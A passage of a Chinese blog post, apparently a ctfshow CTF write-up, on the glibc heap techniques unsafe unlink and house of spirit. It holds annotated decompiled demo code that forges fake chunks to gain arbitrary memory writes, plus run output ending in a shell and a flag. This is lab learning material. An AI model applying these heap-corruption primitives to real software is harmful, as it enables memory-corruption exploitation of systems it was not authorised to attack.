{"id":792,"date":"2025-12-15T21:23:02","date_gmt":"2025-12-15T13:23:02","guid":{"rendered":"http:\/\/lycoreco.cn\/?p=792"},"modified":"2026-05-21T13:54:52","modified_gmt":"2026-05-21T05:54:52","slug":"ctfshow%e5%a0%86%e5%89%8d%e7%bd%aepwn150pwn153","status":"publish","type":"post","link":"http:\/\/lycoreco.cn\/index.php\/2025\/12\/15\/ctfshow%e5%a0%86%e5%89%8d%e7%bd%aepwn150pwn153\/","title":{"rendered":"ctfshow:\u5806\u524d\u7f6epwn150~pwn153"},"content":{"rendered":"\n

pwn150(unsafe_unlink)<\/h2>\n\n\n\n

unsafe_unlink<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n


\u7ee7\u7eed\u5b66\u4e60\u65b0\u77e5\u8bc6\uff0c\u5148\u6765checksec\u4e00\u4e0b<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

64\u4f4d\u5f00\u4e86canary\u548cnx<\/p>\n\n\n\n

\u672c\u5730\u8fd0\u884c\u4e00\u4e0b<\/p>\n\n\n\n

faetong@faetong-virtual-machine:~\/pwnit$ .\/pwn150\n    \u2584\u2584\u2584\u2584   \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584  \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584            \u2584\u2584                           \n  \u2588\u2588\u2580\u2580\u2580\u2580\u2588  \u2580\u2580\u2580\u2588\u2588\u2580\u2580\u2580  \u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580            \u2588\u2588                           \n \u2588\u2588\u2580          \u2588\u2588     \u2588\u2588        \u2584\u2584\u2588\u2588\u2588\u2588\u2588\u2584  \u2588\u2588\u2584\u2588\u2588\u2588\u2588\u2584   \u2584\u2588\u2588\u2588\u2588\u2584  \u2588\u2588      \u2588\u2588\n \u2588\u2588           \u2588\u2588     \u2588\u2588\u2588\u2588\u2588\u2588\u2588   \u2588\u2588\u2584\u2584\u2584\u2584 \u2580  \u2588\u2588\u2580   \u2588\u2588  \u2588\u2588\u2580  \u2580\u2588\u2588 \u2580\u2588  \u2588\u2588  \u2588\u2580\n \u2588\u2588\u2584          \u2588\u2588     \u2588\u2588         \u2580\u2580\u2580\u2580\u2588\u2588\u2584  \u2588\u2588    \u2588\u2588  \u2588\u2588    \u2588\u2588  \u2588\u2588\u2584\u2588\u2588\u2584\u2588\u2588 \n  \u2588\u2588\u2584\u2584\u2584\u2584\u2588     \u2588\u2588     \u2588\u2588        \u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2588  \u2588\u2588    \u2588\u2588  \u2580\u2588\u2588\u2584\u2584\u2588\u2588\u2580  \u2580\u2588\u2588  \u2588\u2588\u2580 \n    \u2580\u2580\u2580\u2580      \u2580\u2580     \u2580\u2580         \u2580\u2580\u2580\u2580\u2580\u2580   \u2580\u2580    \u2580\u2580    \u2580\u2580\u2580\u2580     \u2580\u2580  \u2580\u2580  \n    * *************************************                           \n    * Classify: CTFshow --- PWN --- \u5165\u95e8                              \n    * Type  : Heap_Exploitation                                       \n    * Site  : https:\/\/ctf.show\/                                       \n    * Hint  : Unsafe_Unlink                                           \n    * *************************************                           \n\u5f53\u4f60\u5728\u5df2\u77e5\u4f4d\u7f6e\u6709\u6307\u5411\u67d0\u4e2a\u533a\u57df\u7684\u6307\u9488\u65f6\uff0c\u53ef\u4ee5\u8c03\u7528 unlink\n\u6700\u5e38\u89c1\u7684\u60c5\u51b5\u662f\u6613\u53d7\u653b\u51fb\u7684\u7f13\u51b2\u533a\uff0c\u53ef\u80fd\u4f1a\u6ea2\u51fa\u5e76\u5177\u6709\u5168\u5c40\u6307\u9488\n\u672c\u7ec3\u4e60\u7684\u91cd\u70b9\u662f\u4f7f\u7528 free \u7834\u574f\u5168\u5c40 chunk0_ptr \u6765\u5b9e\u73b0\u4efb\u610f\u5185\u5b58\u5199\u5165\n\n\u5168\u5c40\u53d8\u91cf chunk0_ptr \u5728 0x6020d0, \u6307\u5411 0x2687b2a0\n\u6211\u4eec\u60f3\u8981\u7834\u574f\u7684 chunk \u5728 0x2687b330\n\u5728 chunk0 \u90a3\u91cc\u4f2a\u9020\u4e00\u4e2a chunk\n\u6211\u4eec\u8bbe\u7f6e fake chunk \u7684 'next_free_chunk' (\u4e5f\u5c31\u662f fd) \u6307\u5411 &chunk0_ptr \u4f7f\u5f97 P->fd->bk = P.\n\u6211\u4eec\u8bbe\u7f6e fake chunk \u7684 'previous_free_chunk' (\u4e5f\u5c31\u662f bk) \u6307\u5411 &chunk0_ptr \u4f7f\u5f97 P->bk->fd = P.\n\u901a\u8fc7\u4e0a\u9762\u7684\u8bbe\u7f6e\u53ef\u4ee5\u7ed5\u8fc7\u68c0\u67e5: (P->fd->bk != P || P->bk->fd != P) == False\nFake chunk \u7684 fd: 0x6020b8\nFake chunk \u7684 bk: 0x6020c0\n\n\u73b0\u5728\u5047\u8bbe chunk0 \u4e2d\u5b58\u5728\u4e00\u4e2a\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u66f4\u6539 chunk1 \u7684\u6570\u636e\n\u901a\u8fc7\u4fee\u6539 chunk1 \u4e2d prev_size \u7684\u5927\u5c0f\u4f7f\u5f97 chunk1 \u5728 free \u7684\u65f6\u5019\u8bef\u4ee5\u4e3a \u524d\u9762\u7684 free chunk \u662f\u4ece\u6211\u4eec\u4f2a\u9020\u7684 free chunk \u5f00\u59cb\u7684\n\u5982\u679c\u6b63\u5e38\u7684 free chunk0 \u7684\u8bdd chunk1 \u7684 prev_size \u5e94\u8be5\u662f 0x90 \u4f46\u73b0\u5728\u88ab\u6539\u6210\u4e86 0x80\n\u63a5\u4e0b\u6765\u901a\u8fc7\u628a chunk1 \u7684 prev_inuse \u6539\u6210 0 \u6765\u628a\u4f2a\u9020\u7684\u5806\u5757\u6807\u8bb0\u4e3a\u7a7a\u95f2\u7684\u5806\u5757\n\n\u73b0\u5728\u91ca\u653e\u6389 chunk1\uff0c\u4f1a\u89e6\u53d1 unlink\uff0c\u5408\u5e76\u4e24\u4e2a free chunk\n\u6b64\u65f6\uff0c\u6211\u4eec\u53ef\u4ee5\u7528 chunk0_ptr \u8986\u76d6\u81ea\u8eab\u4ee5\u6307\u5411\u4efb\u610f\u4f4d\u7f6e\nchunk0_ptr \u73b0\u5728\u6307\u5411\u6211\u4eec\u60f3\u8981\u7684\u4f4d\u7f6e\uff0c\u6211\u4eec\u7528\u5b83\u6765\u8986\u76d6\u6211\u4eec\u7684 victim string\u3002\n\u4e4b\u524d\u7684\u503c\u662f: Hello!~\n\u65b0\u7684\u503c\u662f: Hello!~\n$sh\n$ $ ls\nflag  pwn150\n$ cat flag\nflag{Inoue_Takina}\n$ \n<\/code><\/pre>\n\n\n\n
\u8fd9\u4e2a\u6587\u5b57\u6709\u70b9\u770b\u4e0d\u61c2\uff0c\u63a5\u4e0b\u6765\u5148\u4e0d\u7740\u6025\uff0c\u95ee\u95ee\u77e5\u8bc6\u70b9<\/p>\n\n\n\n
\n
\u9996\u5148<\/strong>unsafe_unlink\u662f\u4ec0\u4e48\uff1a<\/strong><\/p>\n\n\n\n
\n
\n
unsafe unlink \u662f glibc \u65e9\u671f\u5806\u7ba1\u7406\u7684\u4e00\u7c7b\u6f0f\u6d1e\u5229\u7528\u65b9\u5f0f
\u5229\u7528 free \u5408\u5e76\uff08unlink\uff09\u65f6\u7684\u94fe\u8868\u64cd\u4f5c\u6f0f\u6d1e<\/strong>
\u6765\u5b9e\u73b0 \u4efb\u610f\u5730\u5740\u5199\uff08Arbitrary Write\uff09<\/strong><\/mark><\/p>\n<\/div>\n<\/div><\/div>\n<\/div>\n\n\n\n
\n
\n
\u8fd9\u79cd\u5229\u7528\u65b9\u5f0f\u4f9d\u8d56\u4e8e\uff1a<\/p>\n\n\n\n
    \n
  • glibc \u7248\u672c\u8f83\u8001\uff08\u5982 2.23\u20132.27\uff09<\/li>\n\n\n\n
  • \u4f7f\u7528 fastbin \u4e4b\u524d\u7684 normal bin \/ small bin \/ unsorted bin unlink \u673a\u5236<\/strong><\/li>\n\n\n\n
  • unlink \u64cd\u4f5c\u91cc\u68c0\u67e5\u4e0d\u4e25\u683c\uff08\u6ca1\u6709\u5b8c\u6574\u7684\u5b89\u5168\u6821\u9a8c\uff0c\u53ea\u6709 FD->bk == P && BK->fd == P\uff09<\/li>\n<\/ul>\n<\/div>\n<\/div>\n\n\n\n
    \u8fd9\u9053\u9898\u7684\u6838\u5fc3\u64cd\u4f5c\u5c31\u662f\uff1a \u7528 free \u64cd\u4f5c\u7834\u574f\u5168\u5c40\u6307\u9488 chunk0_ptr\uff0c\u4f7f\u5176\u6307\u5411\u6211\u4eec\u60f3\u8981\u7684\u4f4d\u7f6e\uff0c\u4ece\u800c\u8986\u76d6\u4efb\u610f\u5185\u5bb9\u3002<\/p>\n\n\n\n
    \u63a5\u4e0b\u6765\u9700\u8981\u8bfb\u8bfb\u4ee3\u7801\uff0c\u4e86\u89e3\u6574\u4e2a\u8fc7\u7a0b\u5e72\u4e86\u4ec0\u4e48\uff0c\u65b9\u4fbf\u8c03\u8bd5\uff1a<\/p>\n\n\n\n
    \u4e3b\u8981\u770bdemo\uff1a<\/p>\n\n\n\n
    void __cdecl demo()\n{\n  uint64_t *chunk1_ptr; \/\/ [rsp+10h] [rbp-20h]\n  uint64_t *chunk1_hdr; \/\/ [rsp+18h] [rbp-18h]\n  char victim_string[8]; \/\/ [rsp+20h] [rbp-10h] BYREF\n  unsigned __int64 v3; \/\/ [rsp+28h] [rbp-8h]\n\n  v3 = __readfsqword(0x28u);\n  fwrite(&ptr_, 1u, 0x4Du, stderr);\n  fwrite(&ptr__0, 1u, 0x55u, stderr);\n  fwrite(&ptr__1, 1u, 0x56u, stderr);\n\n  \/\/\u521b\u5efa\u4e24\u4e2achunk\n  chunk0_ptr = (uint64_t *)malloc(0x80u);\n  chunk1_ptr = (uint64_t *)malloc(0x80u);\n  fprintf(stderr, &format_, &chunk0_ptr, chunk0_ptr);\n  fprintf(stderr, &format__0, chunk1_ptr);\n  fwrite(&ptr__2, 1u, 0x24u, stderr);\n  fwrite(&ptr__3, 1u, 0x66u, stderr);\n\n  \/\/\u4e0b\u9762\u662f\u5728\u4f2a\u9020fake chunk\n  \/\/ chunk0_ptr[2] \u662f fake_chunk.fd\n  \/\/ \u8bbe\u7f6e fd = &chunk0_ptr - 3\uff0c\u4e5f\u5c31\u662f chunk0_ptr \u5730\u5740\u9644\u8fd1\u7684\u4f4d\u7f6e\n  chunk0_ptr[2] = (uint64_t)(&chunk0_ptr - 3);\n  fwrite(&ptr__4, 1u, 0x6Au, stderr);\n  fwrite(&ptr__5, 1u, 0x55u, stderr);\n\n  \/\/ chunk0_ptr[3] = fake_chunk.bk\n  \/\/ \u8bbe\u7f6e bk = &chunk0_ptr - 2\n  chunk0_ptr[3] = (uint64_t)(&chunk0_ptr - 2);\n  fprintf(stderr, aFakeChunk, chunk0_ptr[2]);\n  fprintf(stderr, aFakeChunk_0, chunk0_ptr[3]);\n  fwrite(&ptr__6, 1u, 0x50u, stderr);\n\n  \/\/\u4fee\u6539 chunk1 \u7684 metadata\n  \/\/ chunk1 \u7684 header \u4ece data \u5f80\u524d 2 \u4e2a uint64\n  chunk1_hdr = chunk1_ptr - 2;\n  fwrite(&ptr__7, 1u, 0x95u, stderr);\n\n  \/\/ \u7b2c\u4e00\u6b65\uff1a\u4fee\u6539 prev_size = 128 (0x80)\n  \/\/ \u8fd9\u4e2a\u503c\u5fc5\u987b\u7b49\u4e8e fake chunk \u7684 size\uff0c\u4f7f free \u8ba4\u4e3a\u524d\u9762\u662f free chunk\n  *chunk1_hdr = 128;\n  fprintf(stderr, &format__1, *(chunk1_ptr - 2));\n  fwrite(&ptr__8, 1u, 0x61u, stderr);\n\n  \/\/ \u7b2c\u4e8c\u6b65\uff1a\u628a chunk1 \u7684 prev_inuse \u6807\u5fd7\u4f4d\u6e05\u96f6\n  \/\/ \u5373 size \u5b57\u6bb5\u6700\u4f4e\u4f4d &= ~1\n  \/\/ \u8ba9 free \u8ba4\u4e3a\u524d\u9762 chunk \u662f \"free \u7684\"\n  chunk1_hdr[1] &= ~1uLL;\n  fwrite(&ptr__9, 1u, 0x44u, stderr);\n\n  \/\/\u7b2c\u56db\u6b65\uff1afree(chunk1) \u89e6\u53d1 unsafe unlink\n  free(chunk1_ptr);\n  \/\/ free \u65f6 glibc \u68c0\u67e5 chunk1 \u524d\u9762\u7684 chunk \u662f\u5426 free\n  \/\/ \u7531\u4e8e prev_inuse=0 \u4e14 prev_size=0x80\n  \/\/ free \u4f1a\u8ba4\u4e3a chunk0 \u7684 fake chunk \u662f free chunk\n  \/\/\n  \/\/ \u5b83\u4f1a\u6267\u884c unlink(fake_chunk)\n  \/\/ \u5176\u4e2d fd\/bk \u88ab\u4f2a\u9020\u4e3a &chunk0_ptr \u9644\u8fd1\n  \/\/ \u4e8e\u662f unlink \u4f1a\u8986\u76d6 chunk0_ptr \u2014\u2014> \u4efb\u610f\u5730\u5740\u5199\u53d1\u751f\uff01\n  \n  fwrite(&ptr__10, 1u, 0x46u, stderr);\n\n  \/\/\u7b2c\u4e94\u6b65\uff1a\u6b63\u5e38\u5199\u5165 victim_string\n  strcpy(victim_string, \"Hello!~\");\n\n  \/\/\u7b2c\u516d\u6b65\uff1a\u5229\u7528 chunk0_ptr \u5199\u4efb\u610f\u5730\u5740\n  \/\/ chunk0_ptr \u5df2\u7ecf\u88ab\u6211\u4eec\u5229\u7528 unlink \u8986\u76d6\uff0c\n  \/\/ \u73b0\u5728\u5b83\u4e0d\u518d\u6307\u5411\u539f\u6765\u7684\u5806\u5757\uff0c\u800c\u662f\u6211\u4eec\u60f3\u8981\u7684\u5730\u5740\n  chunk0_ptr[3] = (uint64_t)victim_string;\n  fwrite(&ptr__11, 1u, 0x5Fu, stderr);\n  fprintf(stderr, &format__2, victim_string);\n\n  \/\/ \u7b2c\u4e03\u6b65\uff1a\u4efb\u610f\u5730\u5740\u5199\u6700\u7ec8\u6548\u679c\n  \/\/ \u7531\u4e8e chunk0_ptr \u73b0\u5728\u6307\u5411 victim_string\n  \/\/ *chunk0_ptr = 0x4141414142424242 \u5c31\u5199\u5230\u4e86 victim_string \u91cc\u9762\uff01\n  *chunk0_ptr = 0x4141414142424242LL;\n  fprintf(stderr, &format__3, victim_string);\n}<\/code><\/pre>\n\n\n\n
    \u5176\u5b9e\u8bfb\u5b8c\u8111\u5b50\u8fd8\u662f\u53d1\u61f5\u628a chunk1 \u7684 prev_inuse \u6807\u5fd7\u4f4d\u6e05\u96f6\u8fd8\u662f\u6ca1\u770b\u61c2<\/p>\n\n\n\n
    ok\u521d\u6b65\u4e86\u89e3\u4e86\u8fd9\u4e2a\u5229\u7528\u8fc7\u7a0b\uff0c\u6211\u4eec\u6765\u8c03\u8bd5\u4e00\u4e0b\u7a0b\u5e8f\uff0c\u770b\u770b\u5229\u7528\u539f\u7406<\/p>\n\n\n\n
    \u53ef\u80fd\u9700\u8981\u5148\u6362\u4e00\u6362\u4f9d\u8d56\uff1a<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n

    \u9996\u5148\u662f\u521b\u5efa\u4e24\u4e2achunk<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u4e0d\u5bf9\u554a\uff0c\u4e3a\u4ec0\u4e48\u524d\u9762\u8fd9\u4e48\u5927\u4e2achunk,\u597d\u50cf\u4e0d\u662f2.27<\/p>\n\n\n\n
    \u6362\u4e00\u6362\uff0c\u662f2.23<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u73b0\u5728\u4e24\u4e2achunk\u5df2\u7ecf\u521b\u5efa\u597d\u4e86<\/p>\n\n\n\n
    \u7136\u540e\u662f\u4f2a\u9020fake chunk.fd\u7b49\u4e00\u7cfb\u5217\u64cd\u4f5c\uff0c\u6211\u4eec\u5c31\u8fd0\u884c\u5230free\u4e4b\u524d<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    fake fd=0x6020b8,fake bk=0x6020c0,fake fd+0x18=fake bk+0x10=0x6020d0<\/p>\n\n\n\n
    \u539f\u672c\u76840x91\u88ab\u6539\u4e3a0x90<\/p>\n\n\n\n
    \u8868\u793a\u4e0a\u4e00\u4e2achunck\u662f\u91ca\u653e\u72b6\u6001\uff0c\u7d27\u63a5\u7740<\/p>\n\n\n\n
    fake prev size=0x80\uff0c\u672c\u6765\u662f0x90\u7684size\uff0c\u88ab\u7be1\u6539\u4e86<\/p>\n\n\n\n
    \u91ca\u653echunck\u7684\u65f6\u5019\uff0c\u4f1a\u68c0\u67e5\u76f8\u90bb\u7684chunck\u662f\u5426\u4e5f\u662f\u88ab\u91ca\u653e\u7684\uff08\u68c0\u67e5inuse\uff09\uff0c\u7136\u540e\u6839\u636eprev size\u53bb\u67e5\u627e\u4e0a\u4e00\u4e2achunck\uff0c\u6b64\u65f6prev size=0x80\uff0c\u90a3\u5c31\u628afake fd\u548cfake bk\u5f53\u4f5c\u771f\u6b63\u7684fd\u548cbk\u4e86<\/p>\n\n\n\n
    \u7136\u540e\u5728free\u524d<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    free\u6307\u5411\u7684\u662f0x6030a0<\/p>\n\n\n\n
    \u7136\u540efree<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n

    \u6211\u4eec\u770b\u770bchunk0_ptr<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n

    \u662f\u5df2\u7ecf\u88ab\u6539\u53d8\u8fc7\u4e86\uff0c\u867d\u7136\u8fd8\u662f\u6709\u4e00\u70b9\u4e0d\u7406\u89e3\uff0c\u5148\u62ff\u4e2aflag\u5427<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u96be\u7684\u634f…<\/p>\n\n\n\n
    pwn151(house_of_spirit)<\/h2>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    house_of_spirit\uff0c\u53c8\u6765\u5b66\u4e60\u65b0\u77e5\u8bc6<\/p>\n\n\n\n
    checksec:<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n

    64\u4f4d\u5f00\u4e86canary\u548cnx<\/p>\n\n\n\n
    faetong@faetong-virtual-machine:~\/pwnit$ .\/pwn151\n    \u2584\u2584\u2584\u2584   \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584  \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584            \u2584\u2584                           \n  \u2588\u2588\u2580\u2580\u2580\u2580\u2588  \u2580\u2580\u2580\u2588\u2588\u2580\u2580\u2580  \u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580            \u2588\u2588                           \n \u2588\u2588\u2580          \u2588\u2588     \u2588\u2588        \u2584\u2584\u2588\u2588\u2588\u2588\u2588\u2584  \u2588\u2588\u2584\u2588\u2588\u2588\u2588\u2584   \u2584\u2588\u2588\u2588\u2588\u2584  \u2588\u2588      \u2588\u2588\n \u2588\u2588           \u2588\u2588     \u2588\u2588\u2588\u2588\u2588\u2588\u2588   \u2588\u2588\u2584\u2584\u2584\u2584 \u2580  \u2588\u2588\u2580   \u2588\u2588  \u2588\u2588\u2580  \u2580\u2588\u2588 \u2580\u2588  \u2588\u2588  \u2588\u2580\n \u2588\u2588\u2584          \u2588\u2588     \u2588\u2588         \u2580\u2580\u2580\u2580\u2588\u2588\u2584  \u2588\u2588    \u2588\u2588  \u2588\u2588    \u2588\u2588  \u2588\u2588\u2584\u2588\u2588\u2584\u2588\u2588 \n  \u2588\u2588\u2584\u2584\u2584\u2584\u2588     \u2588\u2588     \u2588\u2588        \u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2588  \u2588\u2588    \u2588\u2588  \u2580\u2588\u2588\u2584\u2584\u2588\u2588\u2580  \u2580\u2588\u2588  \u2588\u2588\u2580 \n    \u2580\u2580\u2580\u2580      \u2580\u2580     \u2580\u2580         \u2580\u2580\u2580\u2580\u2580\u2580   \u2580\u2580    \u2580\u2580    \u2580\u2580\u2580\u2580     \u2580\u2580  \u2580\u2580  \n    * *************************************                           \n    * Classify: CTFshow --- PWN --- \u5165\u95e8                              \n    * Type  : Heap_Exploitation                                       \n    * Site  : https:\/\/ctf.show\/                                       \n    * Hint  : House_of_spirit                                         \n    * *************************************                           \n\u8fd9\u4e2a\u4f8b\u5b50\u6f14\u793a\u4e86 house of spirit \u653b\u51fb\n\u6211\u4eec\u5c06\u6784\u9020\u4e00\u4e2a fake chunk \u7136\u540e\u91ca\u653e\u6389\u5b83\uff0c\u8fd9\u6837\u518d\u6b21\u7533\u8bf7\u7684\u65f6\u5019\u5c31\u4f1a\u7533\u8bf7\u5230\u5b83\n\u8986\u76d6\u4e00\u4e2a\u6307\u5411 fastbin \u7684\u6307\u9488\n\u8fd9\u5757\u533a\u57df (\u957f\u5ea6\u4e3a: 80) \u5305\u542b\u4e24\u4e2a chunk. \u7b2c\u4e00\u4e2a\u5728 0x7ffdaeb1b128 \u7b2c\u4e8c\u4e2a\u5728 0x7ffdaeb1b168.\n\u6784\u9020 fake chunk \u7684 size\uff0c\u8981\u6bd4 chunk \u5927 0x10\uff08\u56e0\u4e3a chunk \u5934\uff09\uff0c\u540c\u65f6\u8fd8\u8981\u4fdd\u8bc1\u5c5e\u4e8e fastbin\uff0c\u5bf9\u4e8e fastbin \u6765\u8bf4 prev_inuse \u4e0d\u4f1a\u6539\u53d8\uff0c\u4f46\u662f\u5176\u4ed6\u4e24\u4e2a\u4f4d\u9700\u8981\u6ce8\u610f\u90fd\u8981\u4f4d 0\nnext chunk \u7684\u5927\u5c0f\u4e5f\u8981\u6ce8\u610f\uff0c\u8981\u5927\u4e8e 0x10 \u5c0f\u4e8e av->system_mem\uff08128kb\uff09\n\u73b0\u5728\uff0c\u6211\u4eec\u62ff\u4f2a\u9020\u7684\u90a3\u4e2a fake chunk \u7684\u5730\u5740\u8fdb\u884c free, 0x7ffdaeb1b130.\nfree!\n\u73b0\u5728 malloc \u7684\u65f6\u5019\u5c06\u4f1a\u628a 0x7ffdaeb1b130 \u7ed9\u8fd4\u56de\u56de\u6765\nmalloc(0x30): 0x7ffdaeb1b130\nFinish!\n$sh\n$ $ cat flag\nflag{Inoue_Takina}\n$ \n<\/code><\/pre>\n\n\n\n
    \u4f9d\u65e7\u770b\u4e0d\u61c2TAT,\u5148\u4e86\u89e3\u4e00\u4e0b\u4ec0\u4e48\u662fhouse_of_spirit<\/p>\n\n\n\n
    house_of_spirit\u662f\u4ec0\u4e48<\/h3>\n\n\n\n
    \n
    House of Spirit \u662f\u4e00\u79cd\u5806\u5229\u7528\u6280\u5de7\uff0c\u5b83\u5141\u8bb8\u653b\u51fb\u8005\u628a\u4efb\u610f\u5730\u5740\u4f2a\u88c5\u6210\u4e00\u4e2a chunk\uff0c\u5e76\u8ba9 malloc() \u8fd4\u56de\u8fd9\u4e2a\u4f2a\u9020\u7684\u5730\u5740\u3002<\/strong><\/p>\n\n\n\n
    \u5229\u7528\u601d\u8def\uff1a<\/p>\n\n\n\n
      \n
    1. \u4f2a\u9020 chunk \u5934\uff08fake chunk\uff09<\/strong><\/li>\n\n\n\n
    2. \u8c03\u7528 free(fake_chunk)<\/strong> \u2014\u2014 \u628a\u5b83\u4e22\u8fdb fastbin<\/li>\n\n\n\n
    3. \u518d\u6b21 malloc()<\/strong> \u2014\u2014 malloc \u4f1a\u4ece fastbin \u53d6\u5230\u8fd9\u4e2a fake chunk<\/li>\n\n\n\n
    4. \u4e8e\u662f\u7528\u6237\u62ff\u5230\u4e00\u4e2a\u81ea\u5df1\u4efb\u610f\u63a7\u5236\u7684\u5730\u5740<\/strong><\/li>\n<\/ol>\n\n\n\n
      \u6700\u7ec8\u5c31\u80fd\u628a malloc \u7684\u8fd4\u56de\u503c\u5b9a\u4f4d\u5230\u4efb\u610f\u53ef\u5199\u533a\u57df\uff08\u4f8b\u5982 .bss<\/code>, \u6808\uff0c\u6216\u5168\u5c40\u53d8\u91cf\u533a\uff09\u3002<\/p>\n<\/div>\n\n\n\n
      \u4f3c\u4e4e\u53c8\u662f\u6d89\u53ca\u5230\u5bf9chunk\u5934\u7684\u4f2a\u9020<\/p>\n\n\n\n
      House of Spirit \u7684\u5b9e\u8d28<\/h3>\n\n\n\n
      \n
      \u4f60\u5f3a\u884c\u8ba9 glibc \u628a\u4e00\u4e2a\u4f60\u4f2a\u9020\u7684 fake chunk \u5f53\u6210\u6b63\u786e\u7684 chunk \u8fdb\u884c\u7ba1\u7406\u3002<\/strong><\/p>\n\n\n\n
      \u8fd9\u4e2a fake chunk \u539f\u672c\u4e0d\u5c5e\u4e8e\u5806\uff0c\u4e5f\u4e0d\u662f malloc \u5206\u914d\u7684\u3002\u4f46\u901a\u8fc7 carefully-crafted headers\uff0cglibc \u65e0\u6cd5\u533a\u5206\u771f\u5047\u3002<\/p>\n<\/div>\n\n\n\n
      \u518d\u6b21\u7406\u89e3\u4e00\u4e0b\u4e3a\u4ec0\u4e48\u8981\u4f2a\u9020<\/h3>\n\n\n\n
      \n
      \u56e0\u4e3a free(chunk) \u4f1a\u505a\u8fd9\u4e9b\u68c0\u67e5\uff1a<\/p>\n\n\n\n
      chunk->size \u8981\u6ee1\u8db3 fastbin \u7684\u8303\u56f4\uff08\u2264 0x78\uff09<\/p>\n\n\n\n
      chunk->size \u7684\u6700\u4f4e 3 bits \u8981\u6ee1\u8db3 certain rules<\/p>\n\n\n\n
        \n
      • bit0 (prev_inuse) = 1<\/strong>
        \uff08fastbin \u4e0a chunk \u7684 P \u4f4d\u4e0d\u6539\u53d8\uff09<\/li>\n\n\n\n
      • bit1, bit2 \u5fc5\u987b\u662f 0\uff08\u56e0\u4e3a\u4e0d\u5728 smallbin\/largebin\uff09<\/li>\n<\/ul>\n<\/div>\n\n\n\n
        \u4e86\u89e3\u4e86\u4e00\u4e0b\u539f\u7406\uff0c\u73b0\u5728\u6765\u770b\u770b\u5b9e\u73b0\u8fc7\u7a0b<\/h3>\n\n\n\n
        \u6765\u770b\u770b\u4ee3\u7801\uff1a<\/p>\n\n\n\n
        void __cdecl demo()\n{\n  unsigned __int64 *b; \/\/ [rsp+8h] [rbp-68h]\n  unsigned __int64 fake_chunks[10]; \/\/ [rsp+10h] [rbp-60h] BYREF\n  __int64 v2; \/\/ [rsp+60h] [rbp-10h]\n  unsigned __int64 v3; \/\/ [rsp+68h] [rbp-8h]\n\n  v3 = __readfsqword(0x28u);\n  fwrite(&ptr_, 1u, 0x2Du, stderr);\n  fwrite(&ptr__0, 1u, 0x64u, stderr);\n  malloc(1u);\n  fwrite(&ptr__1, 1u, 0x25u, stderr);\n  fprintf(stderr, &format_, 80, &fake_chunks[1], &fake_chunks[9]);\n  fwrite(&ptr__2, 1u, 0xCBu, stderr);\n\n  \/\/\u6784\u9020 fake chunk \u7684 size \u5b57\u6bb5\n  \/\/fake_chunks[1](\u5730\u5740) = fake_chunk->size = 0x40  \n  \/\/0x40 \u662f fastbin \u7684\u5408\u6cd5\u5927\u5c0f\uff08\u5bf9\u5e94 malloc(0x30)\n  fake_chunks[1] = 64;\n  fwrite(&ptr__3, 1u, 0x53u, stderr);\n\n  \/\/\u6784\u9020 next chunk \u7684 size \u5b57\u6bb5\n  \/\/4660 = 0x1234\uff0c\u8fd9\u662f next_chunk->size \u7684\u503c\n  \/\/free() \u4f1a\u68c0\u67e5 next chunk \u5927\u5c0f\u5fc5\u987b\uff1a\n  \/\/- >= 0x10\n  \/\/- < av->system_mem (128KB)\n  \/\/- alignment \u6b63\u786e\n  \/\/0x1234 \u6ee1\u8db3\u6761\u4ef6\uff0c\u6240\u4ee5 free() \u4f1a\u8ba4\u4e3a\u8fd9\u662f\u5408\u6cd5\u7684\u201c\u4e0b\u4e00\u4e2a chunk\u201d\u3002\n  fake_chunks[9] = 4660;\n\n  \/\/\u6784\u9020 fake chunk \u7684 fd \u5185\u5bb9\n  fake_chunks[2] = 0x4141414141414141LL;\n  v2 = 0x4141414141414141LL;\n  fprintf(stderr, &format__0, &fake_chunks[2]);\n  fwrite(\"free!\\n\", 1u, 6u, stderr);\n\n  \/\/\u91ca\u653e fake chunk \n  free(&fake_chunks[2]);\n  \/*\n  \u56e0\u4e3a\u4e0a\u4e00\u6b65 free(fake_chunk)\u5df2\u7ecf\u628a fake chunk \u94fe\u5230\u4e86 fastbin[0x40] \u4e2d\n  \u6240\u4ee5 malloc(0x30) \u4f1a\u8fd4\u56de fake chunk \u7684\u7528\u6237\u533a\u5730\u5740\n  b == &fake_chunks[2]\n  *\/\n  fprintf(stderr, &format__1, &fake_chunks[2]);\n\n  \/\/malloc \u53d6\u51fa fake chunk\n  b = (unsigned __int64 *)malloc(0x30u);\n  fprintf(stderr, \"malloc(0x30): %p\\n\", b);\n\n  \/\/\u6d4b\u8bd5\u5199\u5165\n  *b = 0x4242424242424242LL;\n  fwrite(\"Finish!\\n\", 1u, 8u, stderr);\n}<\/code><\/pre>\n\n\n\n
        ok\u57fa\u672c\u6d41\u7a0b\u4e86\u89e3\u4e86\uff0c\u53ef\u4ee5\u8c03\u8bd5\u4e00\u4e0b\u7a0b\u5e8f\u4e86<\/p>\n\n\n\n
        \u5728free\u4e4b\u524d\u67d0\u5904\u7684chunk:<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u5728\u6f14\u793a\u4e2d\u6211\u4eec\u77e5\u90530x7fffffffde08\u662ffake chunk1\u7684\u5730\u5740<\/p>\n\n\n\n
